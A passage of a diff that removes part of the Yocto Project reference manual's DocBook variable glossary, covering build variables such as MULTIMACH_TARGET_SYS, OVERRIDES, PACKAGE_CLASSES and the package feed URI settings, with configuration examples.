-                MODULE_TARBALL_LINK_NAME[doc] = "The link name of the kernel module tarball."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The link name of the kernel module tarball.
-                    This variable is set in the
-                    <filename>meta/classes/kernel-artifact-names.bbclass</filename>
-                    file as follows:
-                    <literallayout class='monospaced'>
-     MODULE_TARBALL_LINK_NAME ?= "${KERNEL_ARTIFACT_LINK_NAME}"
-                    </literallayout>
-                    The value of the <filename>KERNEL_ARTIFACT_LINK_NAME</filename>
-                    variable, which is set in the same file, has the following
-                    value:
-                    <literallayout class='monospaced'>
-     KERNEL_ARTIFACT_LINK_NAME ?= "${MACHINE}"
-                    </literallayout>
-                </para>
-
-                <para>
-                    See the
-                    <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
-                    variable for additional information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-MODULE_TARBALL_NAME'><glossterm>MODULE_TARBALL_NAME</glossterm>
-            <info>
-                MODULE_TARBALL_NAME[doc] = "The base name of the kernel module tarball."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The base name of the kernel module tarball.
-                    This variable is set in the
-                    <filename>meta/classes/kernel-artifact-names.bbclass</filename>
-                    file as follows:
-                    <literallayout class='monospaced'>
-     MODULE_TARBALL_NAME ?= "${KERNEL_ARTIFACT_NAME}"
-                    </literallayout>
-                    The value of the
-                    <link linkend='var-KERNEL_ARTIFACT_NAME'><filename>KERNEL_ARTIFACT_NAME</filename></link>
-                    variable, which is set in the same file, has the following
-                    value:
-                    <literallayout class='monospaced'>
-     KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-<!--
-        <glossentry id='var-MULTIMACH_HOST_SYS'><glossterm>MULTIMACH_HOST_SYS</glossterm>
-            <info>
-                MULTIMACH_HOST_SYS[doc] = "Separates files for different machines such that you can build for multiple host machines using the same output directories."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
--->
-<!--
-                    Serves the same purpose as
-                    <link linkend='var-MULTIMACH_TARGET_SYS'><filename>MULTIMACH_TARGET_SYS</filename></link>,
-                    but for the "HOST" system, in situations that involve a
-                    "HOST" and a "TARGET" system.
-                    See the
-                    <link linkend='var-STAGING_DIR_TARGET'><filename>STAGING_DIR_TARGET</filename></link>
-                    variable for more information.
-                </para>
-
-                <para>
-                    The default value of this variable is:
-                    <literallayout class='monospaced'>
-     ${PACKAGE_ARCH}${HOST_VENDOR}-${HOST_OS}
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
--->
-
-        <glossentry id='var-MULTIMACH_TARGET_SYS'><glossterm>MULTIMACH_TARGET_SYS</glossterm>
-            <info>
-                MULTIMACH_TARGET_SYS[doc] = "Separates files for different machines such that you can build for multiple target machines using the same output directories."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Uniquely identifies the type of the target system for
-                    which packages are being built.
-                    This variable allows output for different types of target
-                    systems to be put into different subdirectories of the same
-                    output directory.
-                </para>
-
-                <para>
-                    The default value of this variable is:
-                    <literallayout class='monospaced'>
-     ${PACKAGE_ARCH}${TARGET_VENDOR}-${TARGET_OS}
-                    </literallayout>
-                    Some classes (e.g.
-                    <link linkend='ref-classes-cross-canadian'><filename>cross-canadian</filename></link>)
-                    modify the <filename>MULTIMACH_TARGET_SYS</filename> value.
-                </para>
-
-                <para>
-                    See the
-                    <link linkend='var-STAMP'><filename>STAMP</filename></link>
-                    variable for an example.
-                    See the
-                    <link linkend='var-STAGING_DIR_TARGET'><filename>STAGING_DIR_TARGET</filename></link>
-                    variable for more information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-    <glossdiv id='var-glossary-n'><title>N</title>
-
-        <glossentry id='var-NATIVELSBSTRING'><glossterm>NATIVELSBSTRING</glossterm>
-            <info>
-                NATIVELSBSTRING[doc] = "A string identifying the host distribution."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A string identifying the host distribution.
-                    Strings consist of the host distributor ID
-                    followed by the release, as reported by the
-                    <filename>lsb_release</filename> tool
-                    or as read from <filename>/etc/lsb-release</filename>.
-                    For example, when running a build on Ubuntu 12.10, the value
-                    is "Ubuntu-12.10".
-                    If this information is unable to be determined, the value
-                    resolves to "Unknown".
-                </para>
-
-                <para>
-                    This variable is used by default to isolate native shared
-                    state packages for different distributions (e.g. to avoid
-                    problems with <filename>glibc</filename> version
-                    incompatibilities).
-                    Additionally, the variable is checked against
-                    <link linkend='var-SANITY_TESTED_DISTROS'><filename>SANITY_TESTED_DISTROS</filename></link>
-                    if that variable is set.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-NM'><glossterm>NM</glossterm>
-            <info>
-                NM[doc] = "Minimal command and arguments to run 'nm'."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The minimal command and arguments to run
-                    <filename>nm</filename>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-NO_GENERIC_LICENSE'><glossterm>NO_GENERIC_LICENSE</glossterm>
-            <info>
-                NO_GENERIC_LICENSE[doc] = "Used to allow copying a license that does not exist in common licenses."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Avoids QA errors when you use a non-common, non-CLOSED
-                    license in a recipe.
-                    Packages exist, such as the linux-firmware package, with
-                    many licenses that are not in any way common.
-                    Also, new licenses are added occasionally to avoid
-                    introducing a lot of common license files, which are only
-                    applicable to a specific package.
-                    <filename>NO_GENERIC_LICENSE</filename> is used to allow
-                    copying a license that does not exist in common licenses.
-                </para>
-
-                <para>
-                    The following example shows how to add
-                    <filename>NO_GENERIC_LICENSE</filename> to a recipe:
-                    <literallayout class='monospaced'>
-     NO_GENERIC_LICENSE[<replaceable>license_name</replaceable>] = "<replaceable>license_file_in_fetched_source</replaceable>"
-                    </literallayout>
-                    The following is an example that uses the
-                    <filename>LICENSE.Abilis.txt</filename> file as the license
-                    from the fetched source:
-                    <literallayout class='monospaced'>
-     NO_GENERIC_LICENSE[Firmware-Abilis] = "LICENSE.Abilis.txt"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-NO_RECOMMENDATIONS'><glossterm>NO_RECOMMENDATIONS</glossterm>
-            <info>
-                NO_RECOMMENDATIONS[doc] = "When set to '1', no recommended packages will be installed. Some recommended packages might be required for certain system functionality, such as kernel-modules. It is up to the user to add packages to IMAGE_INSTALL as needed."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Prevents installation of all "recommended-only" packages.
-                    Recommended-only packages are packages installed only
-                    through the
-                    <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>
-                    variable).
-                    Setting the <filename>NO_RECOMMENDATIONS</filename> variable
-                    to "1" turns this feature on:
-                    <literallayout class='monospaced'>
-     NO_RECOMMENDATIONS = "1"
-                    </literallayout>
-                </para>
-
-                <para>
-                    You can set this variable globally in your
-                    <filename>local.conf</filename> file or you can attach it to
-                    a specific image recipe by using the recipe name override:
-                    <literallayout class='monospaced'>
-     NO_RECOMMENDATIONS_pn-<replaceable>target_image</replaceable> = "1"
-                    </literallayout>
-                </para>
-
-                <para>
-                    It is important to realize that if you choose to not install
-                    packages using this variable and some other packages are
-                    dependent on them (i.e. listed in a recipe's
-                    <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>
-                    variable), the OpenEmbedded build system ignores your
-                    request and will install the packages to avoid dependency
-                    errors.
-                    <note>
-                        Some recommended packages might be required for certain
-                        system functionality, such as kernel modules.
-                        It is up to you to add packages with the
-                        <link linkend='var-IMAGE_INSTALL'><filename>IMAGE_INSTALL</filename></link>
-                        variable.
-                    </note>
-                </para>
-
-                <para>
-                    Support for this variable exists only when using the
-                    IPK and RPM packaging backend.
-                    Support does not exist for DEB.
-                </para>
-
-                <para>
-                    See the
-                    <link linkend='var-BAD_RECOMMENDATIONS'><filename>BAD_RECOMMENDATIONS</filename></link>
-                    and the
-                    <link linkend='var-PACKAGE_EXCLUDE'><filename>PACKAGE_EXCLUDE</filename></link>
-                    variables for related information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-NOAUTOPACKAGEDEBUG'><glossterm>NOAUTOPACKAGEDEBUG</glossterm>
-            <info>
-                NOAUTOPACKAGEDEBUG[doc] = "Disables auto package from splitting .debug files."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Disables auto package from splitting
-                    <filename>.debug</filename> files. If a recipe requires
-                    <filename>FILES_${PN}-dbg</filename> to be set manually,
-                    the <filename>NOAUTOPACKAGEDEBUG</filename> can be defined
-                    allowing you to define the content of the debug package.
-                    For example:
-                    <literallayout class='monospaced'>
-     NOAUTOPACKAGEDEBUG = "1"
-     FILES_${PN}-dev = "${includedir}/${QT_DIR_NAME}/Qt/*"
-     FILES_${PN}-dbg = "/usr/src/debug/"
-     FILES_${QT_BASE_NAME}-demos-doc = "${docdir}/${QT_DIR_NAME}/qch/qt.qch"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-    </glossdiv>
-
-    <glossdiv id='var-glossary-o'><title>O</title>
-
-        <glossentry id='var-OBJCOPY'><glossterm>OBJCOPY</glossterm>
-            <info>
-                OBJCOPY[doc] = "Minimal command and arguments to run 'objcopy'."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The minimal command and arguments to run
-                    <filename>objcopy</filename>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-OBJDUMP'><glossterm>OBJDUMP</glossterm>
-            <info>
-                OBJDUMP[doc] = "Minimal command and arguments to run 'objdump'."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The minimal command and arguments to run
-                    <filename>objdump</filename>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-OE_BINCONFIG_EXTRA_MANGLE'><glossterm>OE_BINCONFIG_EXTRA_MANGLE</glossterm>
-            <info>
-                OE_BINCONFIG_EXTRA_MANGLE[doc] = "When a recipe inherits the binconfig.bbclass class, this variable specifies additional arguments passed to the "sed" command."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-binconfig'><filename>binconfig</filename></link>
-                    class, this variable
-                    specifies additional arguments passed to the "sed" command.
-                    The sed command alters any paths in configuration scripts
-                    that have been set up during compilation.
-                    Inheriting this class results in all paths in these scripts
-                    being changed to point into the
-                    <filename>sysroots/</filename> directory so that all builds
-                    that use the script will use the correct directories
-                    for the cross compiling layout.
-                </para>
-
-                <para>
-                    See the <filename>meta/classes/binconfig.bbclass</filename>
-                    in the
-                    <link linkend='source-directory'>Source Directory</link>
-                    for details on how this class applies these additional
-                    sed command arguments.
-                    For general information on the
-                    <filename>binconfig</filename> class, see the
-                    "<link linkend='ref-classes-binconfig'><filename>binconfig.bbclass</filename></link>"
-                    section.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-OE_IMPORTS'><glossterm>OE_IMPORTS</glossterm>
-            <info>
-                OE_IMPORTS[doc] = "An internal variable used to tell the OpenEmbedded build system what Python modules to import for every Python function run by the system."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    An internal variable used to tell the OpenEmbedded build
-                    system what Python modules to import for every Python
-                    function run by the system.
-                </para>
-
-                <note>
-                    Do not set this variable.
-                    It is for internal use only.
-                </note>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-OE_INIT_ENV_SCRIPT'><glossterm>OE_INIT_ENV_SCRIPT</glossterm>
-            <info>
-                OE_INIT_ENV_SCRIPT[doc] = "The name of the build environment setup script for the purposes of setting up the environment within the extensible SDK."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The name of the build environment setup script for the
-                    purposes of setting up the environment within the
-                    extensible SDK.
-                    The default value is "oe-init-build-env".
-                </para>
-
-                <para>
-                    If you use a custom script to set up your build
-                    environment, set the
-                    <filename>OE_INIT_ENV_SCRIPT</filename> variable to its
-                    name.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-OE_TERMINAL'><glossterm>OE_TERMINAL</glossterm>
-            <info>
-                OE_TERMINAL[doc] = "Controls how the OpenEmbedded build system spawns interactive terminals on the host development system."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Controls how the OpenEmbedded build system spawns
-                    interactive terminals on the host development system
-                    (e.g. using the BitBake command with the
-                    <filename>-c devshell</filename> command-line option).
-                    For more information, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#platdev-appdev-devshell'>Using a Development Shell</ulink>" section
-                    in the Yocto Project Development Tasks Manual.
-                 </para>
-
-                 <para>
-                    You can use the following values for the
-                    <filename>OE_TERMINAL</filename> variable:
-                    <literallayout class='monospaced'>
-     auto
-     gnome
-     xfce
-     rxvt
-     screen
-     konsole
-     none
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-OEROOT'><glossterm>OEROOT</glossterm>
-            <info>
-                OEROOT[doc] = "The directory from which the top-level build environment setup script is sourced."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The directory from which the top-level build environment
-                    setup script is sourced.
-                    The Yocto Project provides a top-level build environment
-                    setup script:
-                    <link linkend='structure-core-script'><filename>&OE_INIT_FILE;</filename></link>.
-                    When you run this script, the
-                    <filename>OEROOT</filename> variable resolves to the
-                    directory that contains the script.
-                </para>
-
-                <para>
-                    For additional information on how this variable is used,
-                    see the initialization script.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-OLDEST_KERNEL'><glossterm>OLDEST_KERNEL</glossterm>
-            <info>
-                OLDEST_KERNEL[doc] = "Declares the oldest version of the Linux kernel that the produced binaries must support."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Declares the oldest version of the Linux kernel that the
-                    produced binaries must support.
-                    This variable is passed into the build of the Embedded
-                    GNU C Library (<filename>glibc</filename>).
-                </para>
-
-                <para>
-                    The default for this variable comes from the
-                    <filename>meta/conf/bitbake.conf</filename> configuration
-                    file.
-                    You can override this default by setting the variable
-                    in a custom distribution configuration file.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-OVERRIDES'><glossterm>OVERRIDES</glossterm>
-            <info>
-                OVERRIDES[doc] = "A colon-separated list of overrides that currently apply."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A colon-separated list of overrides that currently apply.
-                    Overrides are a BitBake mechanism that allows variables to
-                    be selectively overridden at the end of parsing.
-                    The set of overrides in <filename>OVERRIDES</filename>
-                    represents the "state" during building, which includes
-                    the current recipe being built, the machine for which
-                    it is being built, and so forth.
-                </para>
-
-                <para>
-                    As an example, if the string "an-override" appears as an
-                    element in the colon-separated list in
-                    <filename>OVERRIDES</filename>, then the following
-                    assignment will override <filename>FOO</filename> with the
-                    value "overridden" at the end of parsing:
-                    <literallayout class='monospaced'>
-     FOO_an-override = "overridden"
-                    </literallayout>
-                    See the
-                    "<ulink url='&YOCTO_DOCS_BB_URL;#conditional-syntax-overrides'>Conditional Syntax (Overrides)</ulink>"
-                    section in the BitBake User Manual for more information on
-                    the overrides mechanism.
-                </para>
-
-                <para>
-                    The default value of <filename>OVERRIDES</filename>
-                    includes the values of the
-                    <link linkend='var-CLASSOVERRIDE'><filename>CLASSOVERRIDE</filename></link>,
-                    <link linkend='var-MACHINEOVERRIDES'><filename>MACHINEOVERRIDES</filename></link>,
-                    and
-                    <link linkend='var-DISTROOVERRIDES'><filename>DISTROOVERRIDES</filename></link>
-                    variables.
-                    Another important override included by default is
-                    <filename>pn-${PN}</filename>.
-                    This override allows variables to be set for a single
-                    recipe within configuration (<filename>.conf</filename>)
-                    files.
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     FOO_pn-myrecipe = "myrecipe-specific value"
-                    </literallayout>
-                    <note><title>Tip</title>
-                        An easy way to see what overrides apply is to search for
-                        <filename>OVERRIDES</filename> in the output of the
-                        <filename>bitbake -e</filename> command.
-                        See the
-                        "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-debugging-viewing-variable-values'>Viewing Variable Values</ulink>"
-                        section in the Yocto Project Development Tasks
-                        Manual for more information.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-    </glossdiv>
-
-    <glossdiv id='var-glossary-p'><title>P</title>
-
-        <glossentry id='var-P'><glossterm>P</glossterm>
-            <info>
-                P[doc] = "The recipe name and version. P is comprised of ${PN}-${PV}."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The recipe name and version.
-                    <filename>P</filename> is comprised of the following:
-                    <literallayout class='monospaced'>
-     ${PN}-${PV}
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PACKAGE_ARCH'><glossterm>PACKAGE_ARCH</glossterm>
-            <info>
-                PACKAGE_ARCH[doc] = "The architecture of the resulting package or packages."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The architecture of the resulting package or packages.
-                </para>
-
-                <para>
-                    By default, the value of this variable is set to
-                    <link linkend='var-TUNE_PKGARCH'><filename>TUNE_PKGARCH</filename></link>
-                    when building for the target,
-                    <link linkend='var-BUILD_ARCH'><filename>BUILD_ARCH</filename></link>
-                    when building for the
-                    build host, and "${SDK_ARCH}-${SDKPKGSUFFIX}" when building
-                    for the SDK.
-                    <note>
-                        See
-                        <link linkend='var-SDK_ARCH'><filename>SDK_ARCH</filename></link>
-                        for more information.
-                    </note>
-                    However, if your recipe's output packages are built
-                    specific to the target machine rather than generally for
-                    the architecture of the machine, you should set
-                    <filename>PACKAGE_ARCH</filename> to the value of
-                    <link linkend='var-MACHINE_ARCH'><filename>MACHINE_ARCH</filename></link>
-                    in the recipe as follows:
-                    <literallayout class='monospaced'>
-     PACKAGE_ARCH = "${MACHINE_ARCH}"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PACKAGE_ARCHS'><glossterm>PACKAGE_ARCHS</glossterm>
-            <info>
-                PACKAGE_ARCHS[doc] = "A list of architectures compatible with the given target in order of priority."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a list of architectures compatible with
-                    the target machine.
-                    This variable is set automatically and should not
-                    normally be hand-edited.
-                    Entries are separated using spaces and listed in order
-                    of priority.
-                    The default value for
-                    <filename>PACKAGE_ARCHS</filename> is "all any noarch
-                    ${PACKAGE_EXTRA_ARCHS} ${MACHINE_ARCH}".
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PACKAGE_BEFORE_PN'><glossterm>PACKAGE_BEFORE_PN</glossterm>
-            <info>
-                PACKAGE_BEFORE_PN[doc] = "Enables easily adding packages to PACKAGES before ${PN} so that the packages can pick up files that would normally be included in the default package."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Enables easily adding packages to
-                    <filename><link linkend='var-PACKAGES'>PACKAGES</link></filename>
-                    before <filename>${<link linkend='var-PN'>PN</link>}</filename>
-                    so that those added packages can pick up files that would normally be
-                    included in the default package.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PACKAGE_CLASSES'><glossterm>PACKAGE_CLASSES</glossterm>
-            <info>
-                PACKAGE_CLASSES[doc] = "This variable specifies the package manager to use when packaging data. It is set in the conf/local.conf file in the Build Directory."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    This variable, which is set in the
-                    <filename>local.conf</filename> configuration file found in
-                    the <filename>conf</filename> folder of the
-                    <link linkend='build-directory'>Build Directory</link>,
-                    specifies the package manager the OpenEmbedded build system
-                    uses when packaging data.
-                </para>
-
-                <para>
-                    You can provide one or more of the following arguments for
-                    the variable:
-                    <literallayout class='monospaced'>
-     PACKAGE_CLASSES ?= "package_rpm package_deb package_ipk package_tar"
-                    </literallayout>
-                    <note><title>Warning</title>
-                        While it is a legal option, the
-                        <filename>package_tar</filename> class has limited
-                        functionality due to no support for package
-                        dependencies by that backend.
-                        Therefore, it is recommended that you do not use it.
-                    </note>
-                    The build system uses only the first argument in the list
-                    as the package manager when creating your image or SDK.
-                    However, packages will be created using any additional
-                    packaging classes you specify.
-                    For example, if you use the following in your
-                    <filename>local.conf</filename> file:
-                    <literallayout class='monospaced'>
-     PACKAGE_CLASSES ?= "package_ipk"
-                    </literallayout>
-                    The OpenEmbedded build system uses the IPK package manager
-                    to create your image or SDK.
-                </para>
-
-                <para>
-                    For information on packaging and build performance effects
-                    as a result of the package manager in use, see the
-                    "<link linkend='ref-classes-package'><filename>package.bbclass</filename></link>"
-                    section.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PACKAGE_DEBUG_SPLIT_STYLE'><glossterm>PACKAGE_DEBUG_SPLIT_STYLE</glossterm>
-            <info>
-                PACKAGE_DEBUG_SPLIT_STYLE[doc] = "Determines how to split up the binary and debug information when creating *-dbg packages to be used with the GNU Project Debugger (GDB)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Determines how to split up the binary and debug information
-                    when creating <filename>*-dbg</filename> packages to be
-                    used with the GNU Project Debugger (GDB).
-                </para>
-
-                <para>
-                    With the
-                    <filename>PACKAGE_DEBUG_SPLIT_STYLE</filename> variable,
-                    you can control where debug information, which can include
-                    or exclude source files, is stored:
-                    <itemizedlist>
-                        <listitem><para>
-                            ".debug": Debug symbol files are placed next
-                            to the binary in a <filename>.debug</filename>
-                            directory on the target.
-                            For example, if a binary is installed into
-                            <filename>/bin</filename>, the corresponding debug
-                            symbol files are installed in
-                            <filename>/bin/.debug</filename>.
-                            Source files are placed in
-                            <filename>/usr/src/debug</filename>.
-                            </para></listitem>
-                        <listitem><para>
-                            "debug-file-directory": Debug symbol files are
-                            placed under <filename>/usr/lib/debug</filename>
-                            on the target, and separated by the path from where
-                            the binary is installed.
-                            For example, if a binary is installed in
-                            <filename>/bin</filename>, the corresponding debug
-                            symbols are installed in
-                            <filename>/usr/lib/debug/bin</filename>.
-                            Source files are placed in
-                            <filename>/usr/src/debug</filename>.
-                            </para></listitem>
-                        <listitem><para>
-                            "debug-without-src": The same behavior as
-                            ".debug" previously described with the exception
-                            that no source files are installed.
-                            </para></listitem>.
-                        <listitem><para>
-                            "debug-with-srcpkg": The same behavior as
-                            ".debug" previously described with the exception
-                            that all source files are placed in a separate
-                            <filename>*-src</filename> pkg.
-                            This is the default behavior.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-
-                <para>
-                    You can find out more about debugging using GDB by reading
-                    the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#platdev-gdb-remotedebug'>Debugging With the GNU Project Debugger (GDB) Remotely</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PACKAGE_EXCLUDE_COMPLEMENTARY'><glossterm>PACKAGE_EXCLUDE_COMPLEMENTARY</glossterm>
-            <info>
-                PACKAGE_EXCLUDE_COMPLEMENTARY[doc] = "Prevents specific packages from being installed when you are installing complementary packages."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Prevents specific packages from being installed when
-                    you are installing complementary packages.
-                </para>
-
-                <para>
-                    You might find that you want to prevent installing certain
-                    packages when you are installing complementary packages.
-                    For example, if you are using
-                    <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>
-                    to install <filename>dev-pkgs</filename>, you might not want
-                    to install all packages from a particular multilib.
-                    If you find yourself in this situation, you can use the
-                    <filename>PACKAGE_EXCLUDE_COMPLEMENTARY</filename> variable
-                    to specify regular expressions to match the packages you
-                    want to exclude.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PACKAGE_EXCLUDE'><glossterm>PACKAGE_EXCLUDE</glossterm>
-            <info>
-                PACKAGE_EXCLUDE[doc] = "Packages to exclude from the installation. If a listed package is required, an error is generated."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Lists packages that should not be installed into an image.
-                    For example:
-                    <literallayout class='monospaced'>
-     PACKAGE_EXCLUDE = "<replaceable>package_name</replaceable> <replaceable>package_name</replaceable> <replaceable>package_name</replaceable> ..."
-                    </literallayout>
-                </para>
-
-                <para>
-                    You can set this variable globally in your
-                    <filename>local.conf</filename> file or you can attach it to
-                    a specific image recipe by using the recipe name override:
-                    <literallayout class='monospaced'>
-     PACKAGE_EXCLUDE_pn-<replaceable>target_image</replaceable> = "<replaceable>package_name</replaceable>"
-                    </literallayout>
-                </para>
-
-                <para>
-                    If you choose to not install
-                    a package using this variable and some other package is
-                    dependent on it (i.e. listed in a recipe's
-                    <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>
-                    variable), the OpenEmbedded build system generates a fatal
-                    installation error.
-                    Because the build system halts the process with a fatal
-                    error, you can use the variable with an iterative
-                    development process to remove specific components from a
-                    system.
-                </para>
-
-                <para>
-                    Support for this variable exists only when using the
-                    IPK and RPM packaging backend.
-                    Support does not exist for DEB.
-                </para>
-
-                <para>
-                    See the
-                    <link linkend='var-NO_RECOMMENDATIONS'><filename>NO_RECOMMENDATIONS</filename></link>
-                    and the
-                    <link linkend='var-BAD_RECOMMENDATIONS'><filename>BAD_RECOMMENDATIONS</filename></link>
-                    variables for related information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PACKAGE_EXTRA_ARCHS'><glossterm>PACKAGE_EXTRA_ARCHS</glossterm>
-            <info>
-                PACKAGE_EXTRA_ARCHS[doc] = "Specifies the list of architectures compatible with the device CPU. This variable is useful when you build for several different devices that use miscellaneous processors."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the list of architectures compatible with the device CPU.
-                    This variable is useful when you build for several different devices that use
-                    miscellaneous processors such as XScale and ARM926-EJS.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PACKAGE_FEED_ARCHS'><glossterm>PACKAGE_FEED_ARCHS</glossterm>
-            <info>
-                PACKAGE_FEED_ARCHS[doc] = "Optionally specifies user-defined package architectures when constructing package feed URIs."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Optionally specifies the package architectures used as
-                    part of the package feed URIs during the build.
-                    When used, the <filename>PACKAGE_FEED_ARCHS</filename>
-                    variable is appended to the final package feed URI, which
-                    is constructed using the
-                    <link linkend='var-PACKAGE_FEED_URIS'><filename>PACKAGE_FEED_URIS</filename></link>
-                    and
-                    <link linkend='var-PACKAGE_FEED_BASE_PATHS'><filename>PACKAGE_FEED_BASE_PATHS</filename></link>
-                    variables.
-                    <note><title>Tip</title>
-                        You can use the <filename>PACKAGE_FEEDS_ARCHS</filename>
-                        variable to whitelist specific package architectures.
-                        If you do not need to whitelist specific architectures,
-                        which is a common case, you can omit this variable.
-                        Omitting the variable results in all available
-                        architectures for the current machine being included
-                        into remote package feeds.
-                    </note>
-                </para>
-
-                <para>
-                    Consider the following example where the
-                    <filename>PACKAGE_FEED_URIS</filename>,
-                    <filename>PACKAGE_FEED_BASE_PATHS</filename>, and
-                    <filename>PACKAGE_FEED_ARCHS</filename> variables are
-                    defined in your <filename>local.conf</filename> file:
-                    <literallayout class='monospaced'>
-     PACKAGE_FEED_URIS = "https://example.com/packagerepos/release \
-                          https://example.com/packagerepos/updates"
-     PACKAGE_FEED_BASE_PATHS = "rpm rpm-dev"
-     PACKAGE_FEED_ARCHS = "all core2-64"
-                    </literallayout>
-                    Given these settings, the resulting package feeds are
-                    as follows:
-                    <literallayout class='monospaced'>
-     https://example.com/packagerepos/release/rpm/all
-     https://example.com/packagerepos/release/rpm/core2-64
-     https://example.com/packagerepos/release/rpm-dev/all
-     https://example.com/packagerepos/release/rpm-dev/core2-64
-     https://example.com/packagerepos/updates/rpm/all
-     https://example.com/packagerepos/updates/rpm/core2-64
-     https://example.com/packagerepos/updates/rpm-dev/all
-     https://example.com/packagerepos/updates/rpm-dev/core2-64
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-PACKAGE_FEED_BASE_PATHS'><glossterm>PACKAGE_FEED_BASE_PATHS</glossterm>
-            <info>
-                PACKAGE_FEED_BASE_PATHS[doc] = "Specifies base path used when constructing package feed URIs."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the base path used when constructing package feed
-                    URIs.
-                    The <filename>PACKAGE_FEED_BASE_PATHS</filename> variable
-                    makes up the middle portion of a package feed URI used
-                    by the OpenEmbedded build system.
-                    The base path lies between the
-                    <link linkend='var-PACKAGE_FEED_URIS'><filename>PACKAGE_FEED_URIS</filename></link>
-                    and
-                    <link linkend='var-PACKAGE_FEED_ARCHS'><filename>PACKAGE_FEED_ARCHS</filename></link>
-                    variables.
-                </para>
-
-                <para>
-                    Consider the following example where the
-                    <filename>PACKAGE_FEED_URIS</filename>,
-                    <filename>PACKAGE_FEED_BASE_PATHS</filename>, and
-                    <filename>PACKAGE_FEED_ARCHS</filename> variables are
-                    defined in your <filename>local.conf</filename> file:
-                    <literallayout class='monospaced'>
-     PACKAGE_FEED_URIS = "https://example.com/packagerepos/release \
-                          https://example.com/packagerepos/updates"
-     PACKAGE_FEED_BASE_PATHS = "rpm rpm-dev"
-     PACKAGE_FEED_ARCHS = "all core2-64"
-                    </literallayout>
-                    Given these settings, the resulting package feeds are
-                    as follows:
-                    <literallayout class='monospaced'>
-     https://example.com/packagerepos/release/rpm/all
-     https://example.com/packagerepos/release/rpm/core2-64
-     https://example.com/packagerepos/release/rpm-dev/all
-     https://example.com/packagerepos/release/rpm-dev/core2-64
-     https://example.com/packagerepos/updates/rpm/all
